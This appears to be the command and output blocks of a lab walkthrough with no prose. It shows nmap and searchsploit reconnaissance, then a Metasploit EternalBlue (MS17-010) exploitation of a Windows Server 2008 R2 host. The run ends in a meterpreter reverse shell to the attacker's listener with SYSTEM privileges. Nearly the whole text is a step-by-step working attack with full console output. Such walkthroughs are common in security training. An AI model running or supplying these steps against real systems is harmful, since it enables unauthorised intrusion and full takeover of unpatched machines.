1
| sudo nmap -sS -sV 10.10.10.7
|
1
2
| searchsploit EternalBlue
searchsploit ms17-010
|
1
2
3
4
5
6
7
8
9
| search eternalblue
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 10.10.10.7
run
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.7
show options
exploit
|
1
2
3
4
5
| ┌──(root㉿kali)-[~]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.213.128 netmask 255.255.255.0 broadcast 192.168.213.255
inet6 fe80::f102:98c8:eec6:9e26 prefixlen 64 scopeid 0x20<link>
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| ┌──(root㉿kali)-[~]
└─# nmap -sS -sV 192.168.213.130
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-31 08:37 EDT
Nmap scan report for 192.168.213.130
Host is up (0.00078s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:07:7A:49 (VMware)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.31 seconds
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| ┌──(root㉿kali)-[~]
└─# searchsploit EternalBlue
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~]
└─# searchsploit ms17-010
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/41987.py
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
| ┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > search eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > setg RHOSTS 192.168.213.130
RHOSTS => 192.168.213.130
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipe yes List of named pipes to check
s.txt
RHOSTS 192.168.213.130 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.213.130:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
[*] 192.168.213.130:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.213.130 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target ma
chines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin
es.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.213.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
| msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.213.128:4444
[*] 192.168.213.130:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.213.130:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
[*] 192.168.213.130:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.213.130:445 - The target is vulnerable.
[*] 192.168.213.130:445 - Connecting to target for exploitation.
[+] 192.168.213.130:445 - Connection established for exploitation.
[+] 192.168.213.130:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.213.130:445 - CORE raw buffer dump (36 bytes)
[*] 192.168.213.130:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.213.130:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.213.130:445 - 0x00000020 37 36 30 30 7600
[+] 192.168.213.130:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.213.130:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.213.130:445 - Sending all but last fragment of exploit packet
[*] 192.168.213.130:445 - Starting non-paged pool grooming
[+] 192.168.213.130:445 - Sending SMBv2 buffers
[+] 192.168.213.130:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.213.130:445 - Sending final SMBv2 buffers.
[*] 192.168.213.130:445 - Sending last fragment of exploit packet!
[*] 192.168.213.130:445 - Receiving response from exploit packet
[+] 192.168.213.130:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.213.130:445 - Sending egg to corrupted connection.
[*] 192.168.213.130:445 - Triggering free of corrupted buffer.
[-] 192.168.213.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.213.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.213.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.213.130:445 - Connecting to target for exploitation.
[+] 192.168.213.130:445 - Connection established for exploitation.
[+] 192.168.213.130:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.213.130:445 - CORE raw buffer dump (36 bytes)
[*] 192.168.213.130:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.213.130:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.213.130:445 - 0x00000020 37 36 30 30 7600
[+] 192.168.213.130:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.213.130:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.213.130:445 - Sending all but last fragment of exploit packet
[*] 192.168.213.130:445 - Starting non-paged pool grooming
[+] 192.168.213.130:445 - Sending SMBv2 buffers
[+] 192.168.213.130:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.213.130:445 - Sending final SMBv2 buffers.
[*] 192.168.213.130:445 - Sending last fragment of exploit packet!
[*] 192.168.213.130:445 - Receiving response from exploit packet
[+] 192.168.213.130:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.213.130:445 - Sending egg to corrupted connection.
[*] 192.168.213.130:445 - Triggering free of corrupted buffer.
[-] 192.168.213.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.213.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.213.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.213.130:445 - Connecting to target for exploitation.
[+] 192.168.213.130:445 - Connection established for exploitation.
[+] 192.168.213.130:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.213.130:445 - CORE raw buffer dump (36 bytes)
[*] 192.168.213.130:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.213.130:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.213.130:445 - 0x00000020 37 36 30 30 7600
[+] 192.168.213.130:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.213.130:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.213.130:445 - Sending all but last fragment of exploit packet
[*] 192.168.213.130:445 - Starting non-paged pool grooming
[+] 192.168.213.130:445 - Sending SMBv2 buffers
[+] 192.168.213.130:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.213.130:445 - Sending final SMBv2 buffers.
[*] 192.168.213.130:445 - Sending last fragment of exploit packet!
[*] 192.168.213.130:445 - Receiving response from exploit packet
[+] 192.168.213.130:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.213.130:445 - Sending egg to corrupted connection.
[*] 192.168.213.130:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.213.130
[*] Meterpreter session 1 opened (192.168.213.128:4444 -> 192.168.213.130:49159) at 2023-03-31 08:47:15 -0400
[+] 192.168.213.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.213.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.213.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
|
1
2
3
4
5
6
7
8
9
10
| meterpreter > sysinfo
Computer : WIN-HJ67T0F30O9
OS : Windows 2008 R2 (6.1 Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
|
